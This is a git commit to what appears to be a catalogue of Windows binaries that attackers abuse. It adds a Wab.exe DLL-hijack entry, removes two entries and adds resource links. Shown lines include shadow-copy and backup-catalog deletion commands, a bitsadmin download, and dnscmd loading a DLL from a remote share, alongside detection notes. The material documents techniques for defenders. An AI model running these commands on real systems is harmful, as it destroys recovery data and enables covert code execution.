Cleaning and adding Wab.exe

master
Oddvar Moe 2018-05-09 15:25:30 +02:00
parent 8b1e87b251
commit 118c337dfb
7 changed files with 50 additions and 67 deletions

View File

@ -3,7 +3,6 @@ Kd.exe Debugger
Certreq.exe Exfiltrate data Certreq.exe Exfiltrate data
Dbghost.exe Dbghost.exe
Robocopy.exe Needs examples Robocopy.exe Needs examples
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins? notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe wbadmin delete catalog -quiet wbadmin.exe wbadmin delete catalog -quiet
@ -15,3 +14,5 @@ WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a7
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/ dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/ http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120 https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution

View File

@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Presentationhost.exe](OSBinaries/Presentationhost.md) [Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md) [Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md) [Psr.exe](OSBinaries/Psr.md)
[Qprocess.exe](OSBinaries/Qprocess.md)
[Reg.exe](OSBinaries/Reg.md) [Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md) [Regedit.exe](OSBinaries/Regedit.md)
[Regasm.exe](OSBinaries/Regasm.md) [Regasm.exe](OSBinaries/Regasm.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md) [Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
[Regini.exe](OSBinaries/Regini.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md) [Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md) [Regsvr32.exe](OSBinaries/Regsvr32.md)
[Replace.exe](OSBinaries/Replace.md) [Replace.exe](OSBinaries/Replace.md)
@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Sc.exe](OSBinaries/Sc.md) [Sc.exe](OSBinaries/Sc.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.md) [Scriptrunner.exe](OSBinaries/Scriptrunner.md)
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md) [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
[Wab.exe](OSBinaries/Wab.md)
[Wmic.exe](OSBinaries/Wmic.md) [Wmic.exe](OSBinaries/Wmic.md)
[Wscript.exe](OSBinaries/Wscript.md) [Wscript.exe](OSBinaries/Wscript.md)
[Xwizard.exe](OSBinaries/Xwizard.md) [Xwizard.exe](OSBinaries/Xwizard.md)

View File

@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
``` ```
Acknowledgements: Acknowledgements:
* Shay Ber - ?
* Dimitrios Slamaris - @dim0x69 * Dimitrios Slamaris - @dim0x69
* Nikhil SamratAshok Mittal - @nikhil_mitt
Code sample: Code sample:
* *
Resources: Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618 * https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Full path: Full path:
``` ```

View File

@ -1,31 +0,0 @@
## Qprocess.exe
* Functions: Credentials
```
qprocess /SERVER:RemoteServer
```
Acknowledgements:
* Rahmat Nurfauzi - @infosecn1nja
Code sample:
*
Resources:
* https://twitter.com/infosecn1nja/status/987268926139592706
Full path:
```
c:\windows\system32\Qprocess.exe
```
Notes:
Some specific details about the binary file.
Detection:
Details about detection.
IOC, Behaviour , User Agents etc

View File

@ -1,30 +0,0 @@
## Regini.exe
* Functions: Credentials
```
regini -m \\RemoteServer Example
```
Acknowledgements:
* Osanda Malith - @OsandaMalith
Code sample:
*
Resources:
* https://twitter.com/OsandaMalith/status/987823644402372608
* https://ss64.com/nt/regini.html
Full path:
```
c:\windows\system32\regini.exe
c:\windows\sysWOW64\regini.exe
```
Notes:
Can also be used to add registry keys
Detection:

38
OSBinaries/Wab.md Normal file
View File

@ -0,0 +1,38 @@
## Wab.exe
* Functions: Execute
```
Wab.exe (requires registry changes)
```
Acknowledgements:
* Adam - @Hexacorn
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
* https://twitter.com/Hexacorn/status/991447379864932352
Full path:
```
C:\Program Files\Windows Mail\wab.exe
C:\Program Files (x86)\Windows Mail\wab.exe
```
Notes:
Searches for wab.dll. Can be manipulated with the following registry key:
```
HKLM\Software\Microsoft\WAB\DLLPath
```
Binary is used to manage Windows contacts/wab files. (Legacy)
Detection:
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath

View File

@ -22,10 +22,12 @@ Resources:
Full path: Full path:
``` ```
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
``` ```
Notes: Notes:
Part of SQL server, but also Office in some versions.